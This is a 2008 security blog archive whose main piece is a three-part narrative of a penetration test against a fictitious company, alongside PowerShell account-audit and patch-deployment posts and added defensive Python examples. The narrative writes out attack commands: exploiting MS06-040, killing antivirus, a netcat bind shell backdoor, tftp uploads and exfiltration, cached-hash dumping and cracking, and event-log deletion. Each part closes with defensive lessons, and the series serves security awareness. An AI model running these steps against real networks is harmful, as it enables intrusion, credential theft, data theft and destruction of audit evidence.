Thursday, November 27, 2008

PowerShell - Finding New User Accounts

Managing user accounts in a large company can sometimes be quite difficult. Keeping track of newly created accounts, or accounts created within a certain period, is not only useful from an administrative point of view but also from a security aspect too. Being able to identify accounts that may have been created during a period of possible compromise is extremely useful.

The PowerShell script below (Get-NewAccount) will ask for 2 dates and then list all accounts created between those dates.

# This script will list new accounts created in the last N days and then count them.

$days = [int](Read-Host "How many days back shall I go?")
Write-Host "This script will display all accounts created in the past $days days. Please wait a few minutes" -fore yellow
$date = (Get-Date).AddDays(-$days)
Write-Host " "
# Quest AD cmdlet; -SizeLimit 0 lifts the default result cap. @() keeps .Count valid when only one account matches.
$TotalAccountsCreated = @(Get-QADUser -SizeLimit 0 | where {$_.whenCreated -ge $date} | select Name,Company)
$TotalAccountsCreated
Write-Host " "
Write-Host "There have been" $TotalAccountsCreated.Count "accounts created in the past $days days" -fore red

Thanks to the guys at PowerShell Community who helped me with this.
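As an added example (not the original script and not the Quest cmdlets), the same check done offline in Python against an LDIF-style export of user objects, taking the two dates the post mentions rather than a day count. The export, account names and OU paths are constructed for the example.

```python
import re
from datetime import datetime, timedelta, timezone

# Constructed LDIF-style export of a few user objects (not real directory data).
SAMPLE_EXPORT = """\
dn: CN=Maria Bloggs,OU=Accounts,DC=hackme,DC=local
sAMAccountName: maria
whenCreated: 20070312081500.0Z

dn: CN=Lee Smith,OU=Customer Care,DC=hackme,DC=local
sAMAccountName: lee
whenCreated: 20081118143000.0Z

dn: CN=svc_backup2,OU=Service Accounts,DC=hackme,DC=local
sAMAccountName: svc_backup2
whenCreated: 20081121020400.0Z

dn: CN=New Starter,OU=Users,DC=hackme,DC=local
sAMAccountName: nstarter
whenCreated: 20081127090000.0Z
"""

def parse_generalized_time(value):
    """AD stores whenCreated as GeneralizedTime in UTC, e.g. 20081118143000.0Z."""
    m = re.fullmatch(r"(\d{14})(?:\.\d+)?Z", value.strip())
    if not m:
        raise ValueError("unexpected whenCreated value: %r" % value)
    return datetime.strptime(m.group(1), "%Y%m%d%H%M%S").replace(tzinfo=timezone.utc)

def parse_ldif(text):
    """Yield one attribute dict per blank-line-separated LDIF record."""
    for block in re.split(r"\n\s*\n", text.strip()):
        record = {}
        for line in block.splitlines():
            key, _, value = line.partition(":")
            record[key.strip()] = value.strip()
        yield record

def accounts_created_between(text, start_date, end_date):
    """Return [(sAMAccountName, whenCreated)] for accounts created on or between
    the two YYYY-MM-DD dates (both whole days inclusive), oldest first."""
    start = datetime.strptime(start_date, "%Y-%m-%d").replace(tzinfo=timezone.utc)
    end = datetime.strptime(end_date, "%Y-%m-%d").replace(tzinfo=timezone.utc) + timedelta(days=1)
    hits = []
    for record in parse_ldif(text):
        created = parse_generalized_time(record["whenCreated"])
        if start <= created < end:
            hits.append((record["sAMAccountName"], created))
    return sorted(hits, key=lambda hit: hit[1])

if __name__ == "__main__":
    found = accounts_created_between(SAMPLE_EXPORT, "2008-11-17", "2008-11-24")
    for name, created in found:
        print(name, created.isoformat())
    print(len(found), "accounts created in the window")
```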

Sunday, November 16, 2008

The Story of a Hack - Part 3. Kung Fu Shopping

Once again, this is just my little story about how some data may be stolen from a network following a penetration. This post is supposed to be educational and should demonstrate that these types of attacks are not rocket science that can only be pulled off by an elite few. This post isn't really Kung Fu, I'll leave that to the brilliant Mr Skoudis. This is just a few DOS commands that show that you can get what you want without having to get a VNC or RDP session.

If you missed the intro, part one or part two you can get them here, here and here. These parts along with this one put together the story of my little hack. I hope you enjoy.

Kung Fu Shopping

Right, so I got on the LAN and I’ve had a little look around. Obviously I’m a lazy git so I’ll go for what I think will be the low hanging fruit, the Test Server. Names can give away so much. Often these are the servers that are just thrown onto a network and are maybe excluded from policies, they are not business critical and only used for testing so they are not patched because after all who’s gonna hack a test box eh? Well I am because that’s the type of box I like.

First I’m going to get a shell on the box with my trusty Metasploit. I saw from my scans that this is a Windows 2003 box with no service pack. I’ll therefore use the most reliable exploit I have, MS06-040 (thank you Microsoft). There are newer exploits that could be used but this is a reliable favourite.

After gaining root (okay System) on the box I like to carefully and quietly look around to get a feel for where I am.

First things first, I want to stop any AV that might be running. So I'll just have a quick look for it.

Net Start

I hoped to see a service running, but nothing. Hmmm.. lets look at the tasks.


Oh, there it is. AVScanner.exe, never heard of that one before. I’ll kill it just to be sure. I don’t want anything messing with any tools I need to upload.

Taskkill /PID 1548

Before I continue it’s handy to get myself a backdoor just in case I drop the Metasploit session. I’ll use Netcat for this. I copy it up to the temp folder, then start a listener on another port.

tftp -i get nc.exe

nc -L -e cmd.exe -p 33333

Okay, now I connect to my backdoor.

nc 33333

Cool. Now I want to get myself another session on the go and get the fantastic Meterpreter going.

Right, I want to dump out anything that needs cracking first so it can be cracked whilst I poke about. Meterpreter lets me dump the local hashes.


Now that’s all well and good, these are nice to have but I really need some domain credentials. For this I’ll use Cachedump.


Ohh, nice. I got me 2 domain user hashes. No admin but that’s okay. I’ll throw these through John with a good wordlist and carry on.

john --wordlist=pwlist.lst --format=mscash cc.txt

One thing I realise is that these are going to be cracked and come back in uppercase so ideally I want to know the password policy so I don’t start locking people out.

Net accounts

There we go, nice relaxed password policies. No biscuit for Bad Admin!

Right, lets get a bit of info on the host and the network. As I go through these commands I like to pipe them out to a file and then periodically copy the file over to my box. This way I have a load more valuable information if I need to re-enter the network at a later time. I still have my nmap scans from earlier, I'll only get rid of stuff after I have what I came for.

So I get the useful network stuff:

Ipconfig /all

arp -a

Ipconfig /displaydns

This gives me the IP info and lets me know who this box has been talking to recently.

I also want to know what about the other hosts on the domain.

Net view

Right, so there’s the file server. I guess the stuff I want is going to be on there. Hang on, let's not be too hasty. I need to have a look around here first. What else have I got on this box? I'll just rip through the directories with tree, then TFTP the file up to my box for easier analysis.

tree c:\ /f /a >filelist.txt

tftp put filelist.txt

Look at that, a backup database file. I’ll have that. I just love the way that people make copies of data and protect those copies so much less than they do the originals.

And some very useful SysInternal tools. Good Admin, you can have that biscuit after all.

So are there any other databases I’ve missed? After all, tree won't pick up hidden files.

Dir /s /a:h *.*

Oh, would you believe it, a hidden password file. It just goes to show what goodies you might find.

type db-pass.txt

Right, lets crack on, the pub opens soon. What am I here for? Accounts database and Customer database. Well they might be in the backup, but I don’t want to take the chance.

Do I have any mapped drives to the server?

Net use

No mapped drives, well lets get one on. First what do I want to map to?

Net view \\File-Server

I can see a data share, I’ll map to that and hopefully be able to grab my data and get out of here.

Net use * \\file-server\data

Tree /f /a

Right, well it seems that the folders are locked down with ACLs.

John has finished on the wordlist so I’ll see what we have. Well I have one account cracked. Hopefully that’ll do the trick.

Net use * \\File-Server\Data Screwy0u /U:lee

Right I can get into Customer Care and after a second or two I get my customer database.

And it's gone! I should have been a magician!

That’s no good. I’m still locked out of Accounts, though, by even more NTFS permissions. I think I need to kick John up the arse and get these passwords cracked. I throw a bigger dictionary at him and enable the rules.

john --wordlist=bigpwlist.lst --rules --format=mscash cc2.txt

Right, now I got a BackupSVC account. Well if my memory serves me well, my recon found that HackMe was listed as a customer of Backup Service, the outsourcing company. Let’s see what groups this account is in, I guess if they are gonna have a support account it's gonna have some decent privileges right?

Net group “accounts” /domain

Net group “domain admins” /domain

Only Maria is in the accounts group, but I did get an account in Domain Admins. Although I can’t see if Domain Admins is a member of Accounts, if not I can always use PWDump to grab AD and then crack Maria’s password.

Right now I’ll just remap my drive with the good old BackupSVC account, hopefully grab my data and be on my merry way.

So. I have my data. I need to do some tidying up. I’ll overwrite and rename the tools I uploaded before deleting them. I also want to remove any shares I created. I know that I will have left some traces but I'll feel a little better about myself after tidying up. I might also use the Time command to make things slightly more interesting for Mr Admin.

And finally I’ll use the handy tools that I found on the test box to delete the logs on the File Server and the Demo Server.

Psloglist \\file-server -u hackme\BackupSVC -p Support01 -c System
Psloglist \\file-server -u hackme\BackupSVC -p Support01 -c Application
Psloglist \\file-server -u hackme\BackupSVC -p Support01 -c Security

Right, I’ve got what I wanted, and now I’m outta here.


  • First lesson, patch. Patch everything, and once you have finished patching, patch some more.
  • Passwords. A good strong password policy that requires passwords to be complex and changed regularly. Also a password audit would have picked up a very weak password on a privileged account such as BackupSVC.
  • Good account policies should be enforced, locking accounts until they are required.
  • Enforce NTFS permissions to lock down access to files, giving access to only those that really need it.
  • Good AV software could have prevented some of the tools I uploaded from working. Yes, I may have been able to modify these tools, but it makes the task of the attacker that much harder.
  • Check logs regularly and have an incident response plan to deal with a security breach.
That's about it really; there are probably loads more steps that could be taken, such as employing HIDS and HIPS, but I'm not really all that well up on those yet.
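As an added example for the last lesson (not part of the original post), a small Python detector run over a constructed Security log export, flagging the artefacts this story leaves behind: a burst of failed logons from one host, a service account logging on from a host it never uses, and the audit log being cleared. The CSV layout, host names and the EXPECTED_SOURCES policy are assumptions of the example.

```python
import csv
import io
from collections import Counter

# Constructed Windows Server 2003 Security log export (CSV), not a real capture.
# Event IDs are the 2003-era ones: 540 successful network logon, 529 logon failure,
# 517 audit log cleared. The column layout is an assumption of this example.
SAMPLE_LOG = """\
time,host,event_id,account,source_host
2008-11-16 18:02:10,FILE-SERVER,540,HACKME\\maria,MARIA-PC
2008-11-16 19:40:58,FILE-SERVER,529,HACKME\\lee,TEST-SERVER
2008-11-16 19:41:03,FILE-SERVER,529,HACKME\\lee,TEST-SERVER
2008-11-16 19:41:09,FILE-SERVER,529,HACKME\\lee,TEST-SERVER
2008-11-16 19:41:15,FILE-SERVER,540,HACKME\\lee,TEST-SERVER
2008-11-16 20:05:44,FILE-SERVER,540,HACKME\\BackupSVC,TEST-SERVER
2008-11-16 20:30:01,FILE-SERVER,517,HACKME\\BackupSVC,TEST-SERVER
"""

# Hypothetical policy: the only hosts a privileged or service account should log on from.
EXPECTED_SOURCES = {"HACKME\\BackupSVC": {"BACKUPSVC-JUMP"}}
FAILED_LOGON_THRESHOLD = 3   # failures from one (account, source) pair before alerting

def detect(log_text, expected_sources=EXPECTED_SOURCES, threshold=FAILED_LOGON_THRESHOLD):
    """Return a list of (severity, time, message) alerts, in log order."""
    alerts = []
    failures = Counter()
    for row in csv.DictReader(io.StringIO(log_text)):
        event_id = int(row["event_id"])
        account, source = row["account"], row["source_host"]
        if event_id == 517:
            # Logs do not clear themselves; treat this as confirmed tampering.
            alerts.append(("CRITICAL", row["time"],
                           "audit log cleared on %s by %s from %s" % (row["host"], account, source)))
        elif event_id == 540 and account in expected_sources and source not in expected_sources[account]:
            alerts.append(("HIGH", row["time"],
                           "%s logged on to %s from unexpected host %s" % (account, row["host"], source)))
        elif event_id == 529:
            failures[(account, source)] += 1
            if failures[(account, source)] == threshold:   # fire once per pair, not per failure
                alerts.append(("MEDIUM", row["time"],
                               "%d failed logons for %s from %s" % (threshold, account, source)))
    return alerts

if __name__ == "__main__":
    for severity, when, message in detect(SAMPLE_LOG):
        print(severity, when, message)
```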

Thanks for reading.

Friday, November 14, 2008

The Story of a Hack - Part 2. Breaking In

Just a reminder, this series of posts, like all my posts, is for educational purposes. Mostly my education, but if anyone else finds them interesting or useful then that's great too.

This is the second part of my little hacking story. The intro can be read here, and the first part here.

I do not condone breaking into networks without permission, the methods I describe here are how I envisage a network might be penetrated by a determined attacker, I could be completely wrong.

Okay, that said lets get on with it.

Breaking In

So I had a little recce of the target and performed a very inconspicuous war-walk with my iPhone. Knowing that HackMe uses WEP on the wireless network and broadcasts the SSID as HackMe speaks volumes about the security stance of the company in general.

So I sit myself in the park opposite the premises on this lovely day along with quite a few other people, all making the most of the warm weather and wanting to get out of the offices. Booting straight into my favourite security distro BackTrack I put my black hat on for a little wireless fun.

To start with I launch kismet, specifying the capture source and with logging turned off.

kismet -c madwifi_ag,wifi0,madwifi -n

Great, I can see the HackMe wireless network and by simply pressing "i" I can get the MAC address of the access point and I make a note of the channel, I'll need these in SpoonWEP.

I fire up the SpoonWEP tool that's included with BackTrack, configure it to point to the WAP, adjust the channel and tell it to use my wireless interface. 2 minutes later and I'm a very happy hacker.

My next step is to associate to the target network with the cracked WEP key and spend a few minutes exploring.

I'll just fire off a few Nmap commands to get an idea of what my target's network looks like. At this stage I don't know if I'm on the internal network or just on a wireless subnet.

Before long it seems as though I am indeed in the internal LAN. I can see a few other hosts that would only usually live on the LAN. This makes life easier, and that's exactly what I want, an easy life.

nmap -sP

nmap -A

oh.... there we go. Test-Server. That's what we like.

Hopefully Test-Server is one of those poor servers that gets sat in the corner and forgotten about. We all know the ones I'm talking about. Don't worry Bad Admin, Bob will give it some attention for you!

  • In my opinion it's a really bad idea to have a wireless network coming straight onto your LAN. It should be firewalled off and should employ strong certificate-based authentication.
  • As I pointed out in the previous post, a number of measures can be taken to secure wireless networks, and although these layers of security can be peeled away, each layer raises the bar slightly and makes the attacker's job harder.
  • Every host on a network is important. As an attacker there are two things I count on to be able to break into a network, poorly patched hosts and human stupidity, and these are both one and the same!

Next............Kung Fu Shopping.

Thursday, November 6, 2008

The Story of a Hack - Part 1. Reconnaissance

If you haven't read the Intro, it might help if you check out that post.

First things first, recon. I want to find out as much information about my target as possible. Some attackers might go straight to scanning IPs, not me, I want to do as little of that as possible at the moment. I start with the best tool I have available for recon, Google!

I scour the target's website. It’s a small and basic website but I get an email address, a flyer in PDF format and a list of office locations and contact details. Well, that’s a start. The website is very 1.0, simple and secure I guess.

So the email address I got off the website is a generic mailbox that many organisations create. Well, let me throw the domain name into Google and get a few results.


Okay, So I get a few results.

What is interesting is that it came up in a SQL Server forum asking a question about MS SQL 2000 Server configuration.

I also use Google to see which sites are linking to HackMe Ltd.

Of the links I get returned the most useful one is from an outsourcing support company called BackupService. They provide small companies with Remote Support and have HackMe Ltd listed as a customer. Interesting, that puts them in scope as a possible attack vector.

Now I turn to the PDF file on the website. I run this through to look at the metadata.

FileType (guessed) = PDF document, version 1.4
MIMEType = application/pdf
CreateDate = 2008:04:01 03:39:33
PDFVersion = 1.4
FileType = PDF
Creator = PrimoPDF
Title = Microsoft Powerpoint Sales Brochure [Compatibility Mode]
ModifyDate = 2008:04:01 03:39:33
PageCount = 9
FileSize = 243 kB
Producer = PrimoPDF
Author = Lena Bloggs

Okay, after a quick Google, I see PrimoPDF is not vulnerable. But I have got another employee name, Lena Bloggs, and I know that my target uses Microsoft Office internally, so they're probably using IE and Outlook too. Mmm, loads of possibilities there for some targeted sploits.

Let's see what I get with a quick bounce email.

I send an email to and have a look at my returned headers.

Delivered-To:
Received: from (
Received-SPF: pass ( best guess record for domain of designates as permitted sender) client-ip=; as permitted sender) smtp.mail=
X-VirusChecked: Checked
X-Msg-Ref:!1225463335!6552390!18
X-StarScan-Version:;,-,-
X-Originating-IP: []
Received: from unknown (HELO (
From:
To:
boundary=""
X-DSNContext: 335a7efd - 4523 - 00000001 - 8004546
Message-ID:
Subject: Delivery Status Notification (Failure)

This is an automatically generated Delivery Status Notification. Delivery to the following recipients failed.

Okay, from my bounce email I get to find out that my target is filtering email for spam and viruses, bugger. That reduces my chances of getting some of my attachments through. I do get the name of an internal server though. I also get some IP addresses.

This is all useful information that will help me decide which attack avenue will be most successful.

Now what have they got on the Internet, I know that they have a web presence and an email server so let’s look at DNS. First I do a Whois to see what that turns up.

So this gives me company and address info, and I also get to see who they use for the Name servers. Nothing too exciting.

Now DNS, For this I will use a couple of tools. Fierce Domain scanner is a favourite of mine, and has served me well before.

perl -dns

This has given me 2 address blocks. One will be the hosted website (, and the other looks like the address block they use for their own servers. I'll focus on that block. What I really want to know is how big the range they use is and whether there are any other hosts accessible.

I use nmap to look for typical edge devices on that class C range.

nmap -sP

This gives me what I suspect is the range they are using, with .32 being the network address and .47 the broadcast.

Now I check the webmail host I found and find that as I expected only port 443 is open.

nmap -F -PN

And then I confirm that IIS is in use.

nmap -PN -p443 -sV

So now I find that they are using Microsoft IIS as suspected.

But Fierce didn't give me a mail server. Well, luckily I get that IP from my email bounce ( remember?).

After applying some nmap magic dust, I get some very interesting info back. It looks as though my target is using a Cisco PIX firewall and they are probably NAT'ing through it to the internal hosts. Again, knowing this will help me shape my attack.

I'll also quickly Dig the MX to verify my bounce email.

dig -t mx

The results confirm what the bounce email found. HackMe is using MessageLabs for mail filtering. Buggers!

Okay, maybe I’ll stretch my legs and go for a little drive. But first I do a quick Google Map of where I'm heading.

Nice, there's a big park right outside my target's office and plenty of streets to park on.

So I stop by the target's office, which is in a built-up area with plenty of other small businesses around. I can park quite close to the premises and, if my iPhone serves me well, I see that they have a lovely wireless network going on.

WEP, you are the weakest link, goodbye!

So what have I got from my recon?

External IP Addresses

  • - mail
  • - webmail

Wireless Network

  • HackMe - WEP encryption

Internal Host Names

  • File-Server

Software in Use

  • MS Office
  • MS IIS
  • PrimoPDF
  • MS Exchange
  • Windows XP
  • Windows 2003 Server
  • MS SQL (maybe)

Other Useful Info

  • Cisco Pix Firewall in use
  • Using MessageLabs for email scanning
  • External Support through BackupService Ltd
  • Head Office is 20 minutes drive.

Not bad for a couple of hours work. This should be fun.

OK, so my attack vectors:

Client side exploits:
I know what software they are using internally so this is certainly a possibility. But I also know that they are filtering mail with a pretty good filtering service so that's not good.

Social Engineering:
I know who HackMe uses for support, and I know quite a lot about the software they use, the names of HackMe employees, and the infrastructure they have. This is certainly a good attack vector.

Bruteforce Webmail:
I know that they have an accessible webmail server, and I have some information to make an attempt at bruteforcing a login. I don't have enough info at this point and this would be pretty messy and unlikely to succeed.

Wireless Penetration:
Knowing they use WEP, have named the AP as HackMe and have not hidden the SSID, this tells me a great deal about the security of HackMe. This will be my preferred attack vector.

Lessons Learned

Okay, So what could HackMe Ltd have done to make the attackers life more difficult.

  • Don’t use WEP. It's very broken. Hide SSIDs and apply MAC address filtering.
  • Strip metadata from documents.
  • Strip email headers.
  • Minimise information disclosed by third parties.
  • Don’t post questions to tech forums from company email addresses that disclose information about your infrastructure.
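As an added example for the "strip metadata" lesson (not from the original post), a minimal Python reader and scrubber for the PDF Info dictionary, the structure that held the Author, Creator and Producer fields harvested above. The PDF bytes are constructed, the key list is an assumption, and the parser only handles simple literal strings.

```python
import re

# Constructed minimal PDF whose Info dictionary mirrors the fields the brochure leaked.
# A real PDF also carries an xref table; this toy file omits it to keep the focus on /Info.
SAMPLE_PDF = b"""%PDF-1.4
1 0 obj
<< /Type /Catalog /Pages 2 0 R >>
endobj
2 0 obj
<< /Type /Pages /Kids [] /Count 0 >>
endobj
3 0 obj
<< /Title (Microsoft Powerpoint Sales Brochure) /Author (Lena Bloggs)
   /Creator (PrimoPDF) /Producer (PrimoPDF) /CreationDate (D:20080401033933) >>
endobj
trailer
<< /Root 1 0 R /Info 3 0 R >>
%%EOF
"""

# Keys that name people, tools and timelines; exactly what a recon pass harvests.
SENSITIVE_KEYS = {"Title", "Author", "Subject", "Keywords", "Creator", "Producer",
                  "CreationDate", "ModDate"}
# /Key (literal string). Simplification: nested or escaped parentheses are not handled.
ENTRY = re.compile(rb"/(\w+)\s*\(([^()]*)\)")

def find_info_body(pdf):
    """Return the bytes between << and >> of the trailer's /Info object, or None."""
    ref = re.search(rb"/Info\s+(\d+)\s+\d+\s+R", pdf)
    if not ref:
        return None
    obj = re.search(rb"(?<!\d)" + ref.group(1) + rb"\s+0\s+obj\s*<<(.*?)>>\s*endobj", pdf, re.S)
    return obj.group(1) if obj else None

def read_metadata(pdf):
    """Map Info dictionary keys to their literal string values."""
    body = find_info_body(pdf)
    if body is None:
        return {}
    return {k.decode(): v.decode("latin-1") for k, v in ENTRY.findall(body)}

def strip_metadata(pdf, keys=SENSITIVE_KEYS):
    """Overwrite sensitive values with spaces. Same-length replacement leaves every
    byte offset unchanged, so an existing xref table stays valid."""
    body = find_info_body(pdf)
    if body is None:
        return pdf

    def blank(m):
        if m.group(1).decode() not in keys:
            return m.group(0)
        prefix = m.group(0)[: m.start(2) - m.start(0)]   # "/Key (" exactly as written
        return prefix + b" " * len(m.group(2)) + b")"

    return pdf.replace(body, ENTRY.sub(blank, body), 1)

if __name__ == "__main__":
    print("before:", read_metadata(SAMPLE_PDF))
    cleaned = strip_metadata(SAMPLE_PDF)
    print("after: ", {k: v.strip() for k, v in read_metadata(cleaned).items()})
```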

Coming up........Breaking in and Kung Fu Shopping.

The Story of a Hack - Introduction

Over the next few posts throughout November I’ll be doing something slightly different. I’ll be demonstrating the penetration into a fictitious company called HackMe Ltd.

The goal of this series of posts is to demonstrate how simple it is to penetrate a network, steal some data, and then erase the evidence of the intrusion. I’ll also be including details of what measures could have been taken to prevent or detect the attack. I want to keep things simple but still as realistic as possible.

Throughout the story I’ll be using common & simple techniques to footprint, scan and penetrate my target. After gaining access to the target, where at all possible I want to just use the native tools on the compromised systems to find and retrieve my data.

This set of posts is written to educate the reader, and hopefully increase security awareness.

Setting the Scene

So I’ve been given my Target. HackMe Ltd is a popular hobbyist magazine distribution company. My job is to steal the customer database and the accounts database. I must find a way in, get the data and get out, leaving as little evidence as possible.

Part 1 - Reconnaissance

Part 2 - Breaking In

Part 3 - Kung Fu Shopping

I hope anyone reading this enjoys these posts and I welcome comments and feedback.

Saturday, November 1, 2008

Poor Man's Patching with PSExec & PowerShell

With the release of such a critical patch as MS08-067 it seems that us "patchers" are up against it. Well this post is just really to detail an alternative method of deploying patches using PSExec and PowerShell.


  • PSExec
  • PowerShell (with Quest AD Cmdlets installed)

1. OK, so first you need to create a share that all the servers can see. Once done download the patch (or patches) and copy them to the share.

2. Now you need a list of all your servers if you don't have one. I would use PowerShell for this.

get-qadobject -sizelimit 0 -type computer | where {$_.osname -match "server"} | select name > c:\servers.txt

Tidy up the text file by removing the header field (Name) manually.

3. Now use PSExec to deploy the patch from the share to the servers listed in the file.

psexec @c:\servers.txt -c \\File-Server\SecurityPatches$\MS08-067.exe /quiet /norestart /overwriteoem

If you have many patches to install you could place the line above into a batch file and simply change the name of the patch on each line.

4. Use PowerShell to reboot all the servers in the list if required. The following PowerShell one-liner will do that.

gc c:\servers.txt | ForEach-Object { gwmi win32_operatingsystem -ComputerName $_ | ForEach-Object { $_.reboot() }}

5. Finally, Use PowerShell to check that the patches have been deployed successfully. The following script will prompt you for your server list file and the HotFix ID you want to check for.

# Query one server over WMI for a single hotfix and return one row either way,
# so servers that are missing the patch show up in the table rather than disappearing.
function Get-HotFix($server,$hotFixID) {
    $results = gwmi win32_quickfixengineering -computer $server -filter "HotFixID='$hotFixID'"
    if ($results) {
        $results | select CSName,HotFixID,@{n="Installed";e={"Yes"}}
    } else {
        $row = "" | select CSName,HotFixID,Installed
        $row.CSName = $server; $row.HotFixID = $hotFixID; $row.Installed = "No"
        $row
    }
}
$hotFixID = Read-Host "Hotfix ID"
gc (Read-Host "Please provide path to server list file") | ForEach-Object { Get-HotFix $_ $hotFixID } | ft -auto

Or you could use WSUS or SMS I guess.